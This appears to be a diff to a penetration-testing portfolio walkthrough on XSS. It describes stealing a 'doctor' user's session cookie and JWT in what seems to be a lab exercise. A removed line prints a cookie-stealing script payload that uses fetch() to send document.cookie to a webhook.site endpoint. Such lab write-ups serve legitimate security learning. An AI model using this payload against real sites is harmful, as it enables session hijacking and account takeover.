shravya235/Penetration-Testing-Portfolio/walkthroughs/XSS.md

 ### 2. Used Cookie Stealer

-<script>fetch("https://webhook.site/YOUR-ID?cookie=" + document.cookie)</script>
-This payload secretly sent the cookies of the doctor user to my webhook endpoint.
+Used a payload which secretly sent the cookies of the doctor user to my webhook endpoint.

 3. Checked DevTools → Application → Cookies
 Grabbed the session JWT from the browser